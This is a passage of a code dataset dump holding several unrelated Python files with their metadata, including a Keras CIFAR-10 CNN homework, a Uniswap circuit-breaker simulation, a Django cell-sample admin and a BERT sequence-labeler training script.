3]\nprint(sum(x*y for x,y in zip(xvec, yvec))) # dot product, 260\n\nfrom math import pi, sin\nsine_table = {x: sin(x*pi/180) for x in range(0, 91)}\n\ndata = 'golf'\nprint(list(data[i] for i in range(len(data)-1, -1, -1))) # ['f', 'l', 'o', 'g']\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 10: StdLib 
1\n\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 11: StdLib 2\n\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 12: Virtual Environments and Packages\n","sub_path":"Python/PythonTutorial/tutorial.py","file_name":"tutorial.py","file_ext":"py","file_size_in_byte":27755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"353102542","text":"from __future__ import print_function\n\n# To plot graphs.\nimport numpy as np\n\nimport sys\n\nfrom tools import collage\nfrom tools import readCIFAR\nfrom matplotlib import pyplot as plt\n\n\n# Example showing how to train and use a Convolutional Neural Network in Keras.\n#\n# You need Keras, OpenCV and tensorflow\n# Install the needed libraries by:\n# pip install keras tensorflow matplotlib\n# If you have cuda-capable GPU, install tensorflow-gpu to make the training\n# much faster.\n#\n# You can use prepared environmenet on merlin.fit.vutbr.cz\n# source /mnt/matylda1/hradis/POV/du03_env/bin/activate\n#\n# The code is compatible only with tensorflow backend. On Merlin, run it by:\n# KERAS_BACKEND=tensorflow python du03.py\n#\n# The KERAS_BACKEND=tensorflow would not bee needed on your own machine as this\n# would be specified in Keras configuration.\n#\n# Get the dataset first by:\n# cd ./data\n# ./downloadCIFAR.sh\n#\n# Feel free to experiment with the network to reach better accuracy.\n# It is possible to get ~92% accuracy using larger network of similar arch.\n# To compare to others, look at:\n# http://rodrigob.github.io/are_we_there_yet/build/classification_datasets_results.html#43494641522d3130\n\n\n# Define network.\n# Input: batch of images 32x32x3\n# Use ReLU nonlinearities after each layer with optimized parameters.\n# Layers:\n# Convolution with 8 3x3 filters\n# Max-pooling with step 2 and pooling area 2x2\n# Convolution with 16 3x3 filters\n# Max-pooling with step 2 and pooling area 2x2\n# Fully connected layer with 256 neurons\n# Dropout with probability 15%\n# Fully connected layer with 256 neurons\n# Dropout with probability 15%\n# Fully connected layer with 10 neurons and softmax activation\n# The last layer will produce probabilities for the 10 classes in CIFAR-10 and\n# it is the output of the model.\ndef build_simple_network():\n # Thease are the layers you need for the network.\n # Documentation is at https://keras.io/layers/core/\n #\n # You can build either sequential model which is simple but restricts the\n # network to single input and single output.\n # https://keras.io/getting-started/sequential-model-guide/\n #\n # Or you can use functional API to build the network which is more\n # flexible and explicitly specifies connections between layers.\n # https://keras.io/getting-started/functional-api-guide/\n from keras.layers import Input, Dense, Dropout, Flatten\n from keras.layers import Conv2D, MaxPooling2D\n from keras.models import Model, Sequential\n\n # FILL\n model = Sequential()\n\n model.add(Conv2D(8, (3, 3), strides=2, input_shape = (32, 32, 3), activation = 'relu'))\n model.add(MaxPooling2D(pool_size = (2, 2)))\n model.add(Conv2D(16, (3, 3), strides=2, activation = 'relu'))\n model.add(MaxPooling2D(pool_size = (2, 2)))\n model.add(Flatten())\n model.add(Dense(256, activation = 'relu'))\n model.add(Dropout(0.15))\n model.add(Dense(256, activation = 'relu'))\n 
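    # dropout regularization after each fully connected layer, matching the 15% rate called for in the spec above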
model.add(Dropout(0.15))\n    model.add(Dense(10, activation = 'softmax'))\n\n    return model\n\n\n# Get the dataset first by:\n# cd ./data\n# ./downloadCIFAR.sh\ndef prepareData(downsample=1):\n    # This reads the dataset.\n    trnData, tstData, trnLabels, tstLabels = readCIFAR(\n        './data/cifar-10-batches-py')\n    print('\\nDataset tensors')\n    print('Training shapes: ', trnData.shape, trnLabels.shape)\n    print('Testing shapes: ', tstData.shape, tstLabels.shape)\n    print()\n\n    # Convert images from RGB to BGR\n    trnData = trnData[::downsample, :, :, ::-1]\n    tstData = tstData[::downsample, :, :, ::-1]\n    trnLabels = trnLabels[::downsample]\n    tstLabels = tstLabels[::downsample]\n\n    # Normalize data\n    # This maps all values in trn. and tst. data to range <-0.5,0.5>.\n    # Some kind of value normalization is preferable to provide\n    # consistent behavior across different problems and datasets.\n    trnData = trnData.astype(np.float32) / 255.0 - 0.5\n    tstData = tstData.astype(np.float32) / 255.0 - 0.5\n    return trnData, tstData, trnLabels, tstLabels\n\n\ndef main():\n\n    model = build_simple_network()\n    print('Model summary:')\n    model.summary()\n\n    from keras import optimizers\n    from keras import losses\n    from keras import metrics\n    model.compile(\n        loss=losses.sparse_categorical_crossentropy,\n        optimizer=optimizers.Adam(lr=0.001),\n        metrics=[metrics.sparse_categorical_accuracy])\n\n\n    trnData, tstData, trnLabels, tstLabels = prepareData()\n    # Show 64 images from each set.\n    trnCollage = collage(trnData[:64] + 0.5)\n    tstCollage = collage(tstData[:64] + 0.5)\n    \n    plt.imshow(trnCollage)\n    plt.title('Training data')\n    plt.show()\n    plt.imshow(tstCollage)\n    plt.title('Testing data')\n    plt.show()\n\n    # Train the network for 5 epochs.\n    model.fit(\n        x=trnData, y=trnLabels,\n        batch_size=64, epochs=5, verbose=1,\n        validation_data=[tstData, tstLabels], shuffle=True)\n\n\n    # To save the network use:\n    model.save('model.h5')\n\n    # Compute network predictions for the test set and show results.\n    print('Compute model predictions for test images and display the results.')\n\n    dataToTest = tstData[::20]\n\n    # Compute network (model) responses for dataToTest input.\n    # This should produce a 2D tensor of the 10 class probabilities for each\n    # image in dataToTest. 
The subsequent code displays the predicted classes.\n # FILL\n classProb = model.predict(dataToTest)\n\n print('Prediction shape:', classProb.shape)\n\n classes = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog',\n 'horse', 'ship', 'truck']\n predictedClasses = np.argmax(classProb, axis=1)\n for i in range(classProb.shape[1]):\n classImages = dataToTest[predictedClasses == i]\n if classImages.shape[0]:\n classCollage = collage(classImages)\n title = 'Predicted class {} - {}'.format(i, classes[i])\n plt.imshow(classCollage + 0.5)\n plt.title(title)\n plt.show()\n\n\n print('Evaluate network error outside of training.')\n loss, acc = model.evaluate(x=tstData, y=tstLabels, batch_size=64)\n print()\n print('Test loss', loss)\n print('Test accuracy', acc)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"3_semestr/POVa/Proj3/du03.py","file_name":"du03.py","file_ext":"py","file_size_in_byte":6239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"576804364","text":"\"\"\"\n2\nhello\nworld\nhi\nworld\n\nSample Output\nYES\nNO\n\nExplanation\nFor the 1st test case, the letter o is common between both strings, hence the answer YES.\nFor the 2nd test case, hi and world do not have a common substring, hence the answer NO.\n\"\"\"\nn = int(input())\nfor _ in range(n):\n\ts1 = set(str(input()))\n\ts2 = set(str(input()))\n\tif set.intersection(s1, s2):\n\t\tprint(\"YES\")\n\telse:\n\t\tprint(\"NO\")","sub_path":"Strings/twostrings.py","file_name":"twostrings.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"485212280","text":"import importlib\nfrom hydroDL.master import basins\nfrom hydroDL.app import waterQuality, wqLinear, wqRela\nfrom hydroDL import kPath\nfrom hydroDL.model import trainTS\nfrom hydroDL.data import gageII, usgs, gridMET, transform\nfrom hydroDL.post import axplot, figplot\n\nimport torch\nimport time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\nfrom hydroDL.model import rnn, crit\nimport os\n\nsiteNo = '01434025'\n# siteNo = '01364959'\ncodeLst = ['00915', '00940', '00955']\n\nvarX = gridMET.varLst\nvarY = ['00060']\ndfX = waterQuality.readSiteX(siteNo, varX)\ndfY = waterQuality.readSiteY(siteNo, varY)\n\nmtdX = waterQuality.extractVarMtd(varX)\nnormX, statX = transform.transInAll(dfX.values, mtdX)\ndfXN = pd.DataFrame(data=normX, index=dfX.index, columns=dfX.columns)\nmtdY = waterQuality.extractVarMtd(varY)\nnormY, statY = transform.transInAll(dfY.values, mtdY)\ndfYN = pd.DataFrame(data=normY, index=dfY.index, columns=dfY.columns)\n\nmatX1 = dfXN[dfXN.index < np.datetime64('2000-01-01')].values\nmatY1 = dfYN[dfYN.index < np.datetime64('2000-01-01')].values\nmatX2 = dfXN[dfXN.index >= np.datetime64('2000-01-01')].values\nmatY2 = dfYN[dfYN.index >= np.datetime64('2000-01-01')].values\nmatX = dfXN.values\nmatY = dfYN.values\n\nnx = len(varX)\nny = len(varY)\nind1 = np.where(~np.isnan(matY1))[0]\nind2 = np.where(~np.isnan(matY2))[0]\nrho = 365\nrhoF = 365\nind1 = ind1[ind1 > rho+rhoF]\n\nnh = 512\nns = 50\nimportlib.reload(rnn)\nmodel = rnn.AgeLSTM(nx=nx, ny=1, nh=nh).cuda()\noptim = torch.optim.Adadelta(model.parameters())\nlossFun = crit.RmseLoss().cuda()\n# train\nmodel.train()\nfor i in range(200):\n t0 = time.time()\n x = np.ndarray([rho+rhoF, ns, nx])\n y = np.ndarray([rho+rhoF, ns, ny])\n for k in range(ns):\n ind = ind1[np.random.randint(len(ind1))]\n 
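        # (editor's note) each training sample is the rho+rhoF-step window of
        # inputs and targets that ends at the randomly drawn labeled index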
x[:, k, :] = matX1[ind-rho-rhoF:ind, :]\n y[:, k, :] = matY1[ind-rho-rhoF:ind, :]\n xx = torch.from_numpy(x).float().cuda()\n yy = torch.from_numpy(y).float().cuda()\n if i == 0:\n try:\n model(xx)\n except:\n pass\n z = model(xx)\n loss = lossFun(z, yy)\n loss.backward()\n optim.step()\n model.zero_grad()\n print('{},{:.3f},{:.3f}'.format(i, loss, time.time()-t0))\n\ntorch.cuda.empty_cache()\n\n# test\nmodel = model.train(mode=False)\n\nxx = torch.from_numpy(matX[:, None, :]).float()\nxxCuda = xx.cuda()\nz2 = model(xxCuda)\n\nfig, ax = plt.subplots(1, 1)\nax.plot(z2.detach().cpu().numpy().flatten(), '-b')\nax.plot(matY, '-r')\nfig.show()\n","sub_path":"app/waterQual/modelNew/tempLSTM.py","file_name":"tempLSTM.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"390344499","text":"from math import floor\n\nfrom uniswap import Uniswap\n\n\n\"\"\"Circuit Breaker\n# Algorithmical Arbitrager\n# Protocol\n# Run at critical moment(s)\n\"\"\"\n\n\nclass Uniswap_with_CB(Uniswap):\n def __init__(self,\n address,\n amount_Gwei, # ex) (1.) * n\n amount_GAS, # ex) (200. ~= 199.5) * n\n init_LT,\n fee=0.003, # 0.3%\n CB_mode=\"swap\", # \"swap\", \"pause\", \"nothing\"\n threshold=0.05 # 5%\n ):\n\n self.Gwei, self.GAS, self.LT = amount_Gwei, amount_GAS, init_LT\n self.k = self.Gwei * self.GAS # constant product\n self.fee = fee\n\n self.LT_holders = {}\n self.LT_holders[address] = init_LT\n\n self.CB_mode = CB_mode\n self.threshold = threshold\n\n \"\"\"Logging\"\"\"\n self.low, self.high, self.normal = 0, 0, 0\n\n def update_mode(self, new_mode):\n self.CB_mode = new_mode\n\n def update_threshold(self, new_threshold):\n self.threshold = new_threshold\n\n \"\"\"Circuit Breaker\"\"\"\n\n # def set_threshold(self, threshold):\n # self.threshold = threshold\n\n def _swap_GAS_to_Gwei(self, oracle_ratio, pool_ratio):\n # Burn GAS & Mint ETH(Gwei)\n delta_Gwei = floor((self.GAS - self.Gwei * oracle_ratio) / (oracle_ratio + pool_ratio))\n Gwei_prime = self.Gwei + delta_Gwei\n GAS_prime = floor(self.GAS - delta_Gwei * pool_ratio)\n\n self._update(Gwei_prime, GAS_prime)\n\n def _swap_Gwei_to_GAS(self, oracle_ratio, pool_ratio):\n # Burn ETH(Gwei) & Mint GAS\n delta_Gwei = floor((self.Gwei * oracle_ratio - self.GAS) / (oracle_ratio + pool_ratio))\n Gwei_prime = self.Gwei - delta_Gwei\n GAS_prime = floor(self.GAS + delta_Gwei * pool_ratio)\n\n self._update(Gwei_prime, GAS_prime)\n\n def _cb_swap(self, oracle_ratio, pool_ratio):\n if pool_ratio > oracle_ratio:\n self._swap_GAS_to_Gwei(oracle_ratio, pool_ratio)\n elif pool_ratio < oracle_ratio:\n self._swap_Gwei_to_GAS(oracle_ratio, pool_ratio)\n\n return\n\n def _cb_pause(self):\n return\n\n def _cb_nothing(self):\n return\n\n def _cb(self, oracle_ratio, pool_ratio):\n if self.CB_mode == \"swap\":\n return self._cb_swap(oracle_ratio, pool_ratio)\n elif self.CB_mode == \"pause\":\n return self._cb_pause()\n else: # nothing\n return self._cb_nothing()\n\n def circuit_break(self, oracle_ratio):\n pool_ratio = float(self.GAS / self.Gwei)\n\n # TODO: Dynamic Circuit Breaker (DCB)\n if (pool_ratio * (1. - self.threshold) >= oracle_ratio):\n # print(\"pool_ratio is too high\")\n self.high += 1\n self._cb(oracle_ratio, pool_ratio)\n return 1 # high\n elif (pool_ratio * (1. 
+ self.threshold) <= oracle_ratio):\n # print(\"pool_ratio is too low\")\n self.low += 1\n self._cb(oracle_ratio, pool_ratio)\n return -1 # low\n else:\n # print(\"no problem\")\n self.normal += 1\n return 0 # same\n\n\nif __name__ == \"__main__\":\n import random\n import matplotlib.pyplot as plt\n\n random.seed(12345)\n # random.seed(950327)\n\n \"\"\"init\"\"\"\n us = Uniswap_with_CB('-1', 100000, 20000000, 1000000,\n CB_mode=\"swap\", threshold=0.05) # 1:200\n us.print_pool_state(bool_LT=True)\n\n \"\"\"Providing Liquidity\"\"\"\n print(us.join('0', 2000, 400001))\n us.print_pool_state(bool_LT=True)\n us.circuit_break(oracle_ratio=200.)\n\n \"\"\"Txs\"\"\"\n nRounds = 100000\n\n highs, lows = [], []\n Gweis, GASs = [], []\n\n for i in range(nRounds):\n if random.random() < 0.5:\n us.Gwei_to_GAS(10)\n else:\n us.GAS_to_Gwei_exact(10)\n\n cb = us.circuit_break(oracle_ratio=200.)\n\n \"\"\"log\"\"\"\n if cb == 1:\n highs.append(i)\n elif cb == -1:\n lows.append(i)\n\n Gweis.append(us.Gwei)\n GASs.append(us.GAS)\n\n us.print_pool_state(bool_LT=False)\n print(us.low, us.high, us.normal)\n\n \"\"\"Removing Liquidity\"\"\"\n print(us.out('0', 20000)) # The LT holder takes extra fees\n us.print_pool_state(bool_LT=True)\n\n \"\"\"Plot\"\"\"\n fig, ax1 = plt.subplots()\n\n ax1.plot([i for i in range(nRounds)], Gweis, 'b-')\n ax1.set_xlabel('round')\n ax1.set_ylabel('Gwei', color='b')\n ax1.tick_params('y', colors='b')\n\n ax2 = ax1.twinx()\n ax2.plot([i for i in range(nRounds)], GASs, 'r-')\n ax2.set_ylabel('GAS', color='r')\n ax2.tick_params('y', colors='r')\n\n for i in range(len(highs)):\n plt.axvline(x=highs[i], color='black', linestyle='-', linewidth=2)\n\n for i in range(len(lows)):\n plt.axvline(x=lows[i], color='gray', linestyle=':', linewidth=2)\n\n plt.show()\n","sub_path":"src/circuitbreaker.py","file_name":"circuitbreaker.py","file_ext":"py","file_size_in_byte":4866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"187534114","text":"#!/usr/bin/env python3\n\n\"\"\"\nCreated on Wed Jul 31 2019\n\n@author: naokoIida\n\"\"\"\nimport sys\nimport os\n\nfo = sys.argv[1]\n\nif not os.path.exists('alterativeSJ_fil_annot'):\n os.mkdir('alterativeSJ_fil_annot')\nif not os.path.exists('alterativeSJ_fil_annot/'+fo):\n os.mkdir('alterativeSJ_fil_annot/'+fo)\nif not os.path.exists('alterativeSJ_assadjfreq'):\n os.mkdir('alterativeSJ_assadjfreq')\nif not os.path.exists('alterativeSJ_assadjfreq/'+fo):\n os.mkdir('alterativeSJ_assadjfreq/'+fo)\nif not os.path.exists('alterativeSJ_tabixAI'):\n os.mkdir('alterativeSJ_tabixAI')\nif not os.path.exists('alterativeSJ_tabixAI/'+fo):\n os.mkdir('alterativeSJ_tabixAI/'+fo)\nif not os.path.exists('alterativeSJ_cmut'):\n os.mkdir('alterativeSJ_cmut')\nif not os.path.exists('alterativeSJ_cmut/'+fo):\n os.mkdir('alterativeSJ_cmut/'+fo)\n \n","sub_path":"juncmut_env.py","file_name":"juncmut_env.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"324665710","text":"# coding=utf-8\n\n\"\"\"\n\nCellSamples Admin\n\n\"\"\"\n\nfrom django.contrib import admin\nfrom cellsamples.resource import CellSampleResource\nfrom mps.base.admin import LockableAdmin\nfrom models import Organ, CellType, CellSubtype, Supplier, CellSample\n\n\nclass CellTypeAdmin(admin.ModelAdmin):\n save_on_top = True\n list_display = ('cell_name', 'organ')\n\n\nadmin.site.register(CellType, CellTypeAdmin)\n\n\nclass 
CellTypeInline(admin.TabularInline):\n model = CellType\n\n\nclass OrganAdmin(admin.ModelAdmin):\n save_on_top = True\n\n inlines = [CellTypeInline]\n\n\nadmin.site.register(Organ, OrganAdmin)\n\n\nclass CellSubtypeAdmin(admin.ModelAdmin):\n save_on_top = True\n\n\nadmin.site.register(CellSubtype, CellSubtypeAdmin)\n\n\nclass CellSampleAdmin(LockableAdmin):\n\n resource_class = CellSampleResource\n \n save_on_top = True\n\n list_display = ('__unicode__', # calls CellSample.__unicode__ function\n 'supplier',\n 'receipt_date',\n 'barcode',\n 'locked')\n\n search_fields = ['cell_type__cell_type',\n 'cell_type__cell_subtype__cell_subtype',\n 'cell_source',\n 'supplier__name',\n 'barcode',\n 'product_id']\n save_as = True\n fieldsets = (\n (None, {\n 'fields': (('locked',\n 'cell_type'),\n ('cell_source',\n 'receipt_date'),\n ('cell_image'),\n ('notes'),)\n }),\n ('Supplier Information', {\n 'fields': (('supplier', 'product_id', 'barcode'),)\n }),\n ('Patient Information', {\n 'fields': (('patient_age', 'patient_gender',\n 'patient_condition'),)\n }),\n ('Isolation Information', {\n 'fields': (('isolation_datetime'), ('isolation_method',\n 'isolation_notes'),)\n }),\n ('Cell Viability', {\n 'fields': (('viable_count',\n 'viable_count_unit',\n 'percent_viability'),)\n }),\n ('Change Tracking', {\n 'fields': (('created_by',\n 'created_on'),\n ('modified_by',\n 'modified_on'))\n }),\n )\n\n\nadmin.site.register(CellSample, CellSampleAdmin)\n\n\nclass SupplierAdmin(admin.ModelAdmin):\n save_on_top = True\n list_display = ('name', 'phone', 'address')\n\n\nadmin.site.register(Supplier, SupplierAdmin)\n","sub_path":"cellsamples/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"210194973","text":"#------------------------------------------------------------------------------\n# Mach-8: The Virtual Machinery Playpen \n#\n# blackchip.org, Inspired by the Vintage Computer Club. \n# All rites reversed (K) 2011, Reprint what you like.\n#\n# $Id: test_yap.py 130 2012-01-28 02:16:54Z mcgann $\n#------------------------------------------------------------------------------\nfrom mach8.yap import * \nfrom mach8_test import suite\nimport mach8_test.harness.yap\n\nclass TestPrint(mach8_test.harness.yap.TestHarness):\n \n def test_incomplete(self):\n suite.banner(self.test_incomplete) \n \n _; NEW()\n _; PRINTLN('Hello world')\n \n self.run_test() \n self.assertEquals('? 
Program incomplete error\\n', \n self.output.getvalue()) ","sub_path":"tests/mach8_test/unit/yap/test_yap.py","file_name":"test_yap.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"368343585","text":"import sys\n\nsys.path.extend([\"../../\", \"../\", \"./\"])\nimport time\nimport torch.optim.lr_scheduler\nimport torch.nn as nn\nimport random\nimport argparse\nfrom driver.Config import *\nfrom model.BiLSTMModel import *\nfrom transformers import AdamW, get_linear_schedule_with_warmup\nfrom model.BertModel import *\nfrom driver.SLHelper import *\nfrom data.Dataloader import *\nimport pickle\n\n\ndef train(data, dev_data, test_data, labeler, vocab, config):\n optimizers, schedulers = [], []\n\n optimizer_model = Optimizer(filter(lambda p: p.requires_grad, labeler.model.parameters()), config)\n optimizers.append(optimizer_model)\n\n if config.bert_tune == 1:\n no_decay = ['bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in labeler.bert.named_parameters()\n if not any(nd in n for nd in no_decay) and p.requires_grad],\n 'weight_decay': 0.0},\n {'params': [p for n, p in labeler.bert.named_parameters()\n if any(nd in n for nd in no_decay) and p.requires_grad],\n 'weight_decay': 0.0}\n ]\n optimizer_bert = AdamW(optimizer_grouped_parameters, lr=5e-5, eps=1e-8)\n scheduler_bert = get_linear_schedule_with_warmup(optimizer_bert, num_warmup_steps=0,\n num_training_steps=4000)\n optimizers.append(optimizer_bert)\n schedulers.append(scheduler_bert)\n\n global_step = 0\n best_acc = 0\n batch_num = int(np.ceil(len(data) / float(config.train_batch_size)))\n update_freq = config.validate_every * config.update_every\n for iter in range(config.train_iters):\n start_time = time.time()\n print('Iteration: ' + str(iter) + ', total batch num: ' + str(batch_num))\n batch_iter = 0\n\n correct_num, total_num, loss_value = 0, 0, 0\n for onebatch in data_iter(data, config.train_batch_size, True):\n bert_inputs, predicts, masks, rels, heads, lengths, labels = \\\n batch_data_variable(onebatch, vocab)\n\n labeler.model.train()\n\n labeler.forward(bert_inputs, predicts, masks, rels, heads, lengths)\n loss = labeler.compute_loss(labels, masks)\n loss = loss / config.update_every\n loss_value += loss.item()\n loss.backward()\n\n cur_correct, cur_count = labeler.compute_accuracy(labels)\n correct_num += cur_correct\n total_num += cur_count\n acc = correct_num * 100.0 / total_num\n\n batch_iter += 1\n if batch_iter % config.update_every == 0 or batch_iter == batch_num:\n nn.utils.clip_grad_norm_(filter(lambda p: p.requires_grad, labeler.model.parameters()), \\\n max_norm=config.clip)\n if config.bert_tune == 1:\n nn.utils.clip_grad_norm_(filter(lambda p: p.requires_grad, labeler.bert.parameters()), \\\n max_norm=config.clip)\n\n for optimizer in optimizers:\n optimizer.step()\n for scheduler in schedulers:\n scheduler.step()\n\n labeler.model.zero_grad()\n if config.bert_tune == 1:\n labeler.bert.zero_grad()\n\n during_time = float(time.time() - start_time)\n print(\"Step:%d, ACC:%.2f, Iter:%d, batch:%d, time:%.2f, loss:%.2f\" \\\n % (global_step, acc, iter, batch_iter, during_time, loss_value))\n loss_value = 0\n global_step += 1\n\n if batch_iter % update_freq == 0 or batch_iter == batch_num:\n tag_correct, tag_total, dev_tag_acc = \\\n evaluate(dev_data, labeler, vocab, config.dev_file + '.' 
+ str(global_step))\n print(\"Dev: acc = %d/%d = %.2f\" % (tag_correct, tag_total, dev_tag_acc))\n\n tag_correct, tag_total, test_tag_acc = \\\n evaluate(test_data, labeler, vocab, config.test_file + '.' + str(global_step))\n print(\"Test: acc = %d/%d = %.2f\" % (tag_correct, tag_total, test_tag_acc))\n if dev_tag_acc > best_acc:\n print(\"Exceed best acc: history = %.2f, current = %.2f\" % (best_acc, dev_tag_acc))\n best_acc = dev_tag_acc\n if iter > config.save_after > 0:\n torch.save(labeler.model.state_dict(), config.save_model_path)\n\n\ndef evaluate(data, labeler, vocab, outputFile):\n start = time.time()\n labeler.model.eval()\n output = open(outputFile, 'w', encoding='utf-8')\n total_gold_entity_num, total_predict_entity_num, total_correct_entity_num = 0, 0, 0\n\n for onebatch in data_iter(data, config.test_batch_size, False):\n bert_inputs, predicts, masks, rels, heads, lengths, labels = \\\n batch_data_variable(onebatch, vocab)\n count = 0\n predict_labels = labeler.labeler(bert_inputs, predicts, masks, rels, heads, lengths)\n for result in batch_variable_inst(onebatch, predict_labels, vocab):\n printInstance(output, result)\n gold_entity_num, predict_entity_num, correct_entity_num = evalInstance(onebatch[count], result)\n total_gold_entity_num += gold_entity_num\n total_predict_entity_num += predict_entity_num\n total_correct_entity_num += correct_entity_num\n count += 1\n\n output.close()\n\n acc = total_correct_entity_num * 200.0 / (total_predict_entity_num + total_gold_entity_num)\n\n end = time.time()\n during_time = float(end - start)\n print(\"sentence num: %d, labeler time = %.2f \" % (len(data), during_time))\n\n return total_correct_entity_num, total_gold_entity_num, acc\n\n\nclass Optimizer:\n def __init__(self, parameter, config):\n self.optim = torch.optim.Adam(parameter, lr=config.learning_rate, betas=(config.beta_1, config.beta_2),\n eps=config.epsilon)\n decay, decay_step = config.decay, config.decay_steps\n l = lambda epoch: decay ** (epoch // decay_step)\n self.scheduler = torch.optim.lr_scheduler.LambdaLR(self.optim, lr_lambda=l)\n\n def step(self):\n self.optim.step()\n self.schedule()\n self.optim.zero_grad()\n\n def schedule(self):\n self.scheduler.step()\n\n def zero_grad(self):\n self.optim.zero_grad()\n\n @property\n def lr(self):\n return self.scheduler.get_lr()\n\n\nif __name__ == '__main__':\n torch.manual_seed(666)\n torch.cuda.manual_seed(666)\n random.seed(666)\n np.random.seed(666)\n\n # gpu\n gpu = torch.cuda.is_available()\n print(\"GPU available: \", gpu)\n print(\"CuDNN: \\n\", torch.backends.cudnn.enabled)\n\n argparser = argparse.ArgumentParser()\n argparser.add_argument('--config_file', default='default.cfg')\n argparser.add_argument('--thread', default=1, type=int, help='thread num')\n argparser.add_argument('--gpu', default=-1, type=int, help='Use id of gpu, -1 if cpu.')\n\n args, extra_args = argparser.parse_known_args()\n config = Configurable(args.config_file, extra_args)\n torch.set_num_threads(args.thread)\n\n vocab = creat_vocab(config.train_file, config.bert_vocab_file, config.min_occur_count)\n pickle.dump(vocab, open(config.save_vocab_path, 'wb'))\n\n config.use_cuda = False\n gpu_id = -1\n if gpu and args.gpu >= 0:\n torch.cuda.set_device(args.gpu)\n config.use_cuda = True\n print(\"GPU ID: \", args.gpu)\n gpu_id = args.gpu\n\n bert = BertExtractor(config)\n\n model = BiLSTMModel(vocab, config, bert.bert_hidden_size, bert.bert_layers)\n if config.use_cuda:\n # torch.backends.cudnn.enabled = True\n model = model.cuda()\n bert = 
bert.cuda()\n\n labeler = SequenceLabeler(model, bert)\n\n data = read_corpus(config.train_file)\n dev_data = read_corpus(config.dev_file)\n test_data = read_corpus(config.test_file)\n\n train(data, dev_data, test_data, labeler, vocab, config)\n","sub_path":"sequence_labeling/SLBERTSYNTree/driver/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":8071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"315640973","text":"import keras\nimport numpy as np\n# get MSE from scikit_learn\nfrom sklearn.metrics import mean_squared_error\n\n# 1. 데이터 준비\nx = np.array(range(1,101))\ny = np.array(range(101,201))\nx_pred = np.array(range(101,121))\ny_true = np.array(range(201,221))\n\n# shuffle = True is default option.\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(\n x, y, random_state=99, shuffle=True,\n # x, y, shuffle = False,\n train_size=0.6,\n test_size=0.5\n)\n\n# make appropriate proportions\nx_train, x_val, y_train, y_val = train_test_split(\n x_train, y_train, random_state=99, shuffle = True,\n # x_train, y_train, shuffle = False, \n train_size=0.78\n)\n\nprint(len(x_train))\nprint(x_train)\nprint(y_train)\nprint(len(x_val))\nprint(x_val)\nprint(len(x_test))\nprint(x_test)\n\n'''\nx_train = x[:60]\nx_val = x[60:80]\nx_test = x[80:]\n\ny_train = x[:60]\ny_val = x[60:80]\ny_test = x[80:]\n'''\n\n# 2. 모델 구성\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nmodel = Sequential()\n\nmodel.add(Dense(5, input_dim = 1))\nmodel.add(Dense(5, activation = 'relu'))\nmodel.add(Dense(50))\nmodel.add(Dense(50))\nmodel.add(Dense(50))\nmodel.add(Dense(50))\nmodel.add(Dense(50))\nmodel.add(Dense(50))\nmodel.add(Dense(50))\n\n\n# model.add(Dense(50))\n# model.add(Dense(1000000))\n# model.add(Dense(1000000))\n# model.add(Dense(1000000))\n# model.add(Dense(1000000))\nmodel.add(Dense(1))\n\n# 3. 훈련\nmodel.compile(loss='mse', optimizer='adam', metrics=['mse'])\nmodel.fit(x_train, y_train, epochs = 100, batch_size=1,\n validation_data = (x_val, y_val))\n\n# 4. 평가, 예측\nloss, mse = model.evaluate(x_test, y_test, batch_size=1)\nprint(f\"loss : {loss}, mse : {mse}\")\n\ny_pred = model.predict(x_pred)\nprint(f\"y_predict {y_pred}\")\n\n\n# RMSE 구하기\nfrom sklearn.metrics import mean_squared_error\ndef RMSE(y_true, y_predict):\n return np.sqrt(mean_squared_error(y_true, y_pred))\nprint(f\"RMSE : {RMSE(y_true, y_pred)}\")\n\n# R^2 구하기\nfrom sklearn.metrics import r2_score\nr2_y_pred = r2_score(y_true, y_pred)\nprint(f\"R2: {r2_y_pred}\")\n\n","sub_path":"keras/keras12_01_split.py","file_name":"keras12_01_split.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"573536928","text":"#\n# Copyright 2021 Amazon.com, Inc. or its affiliates. 
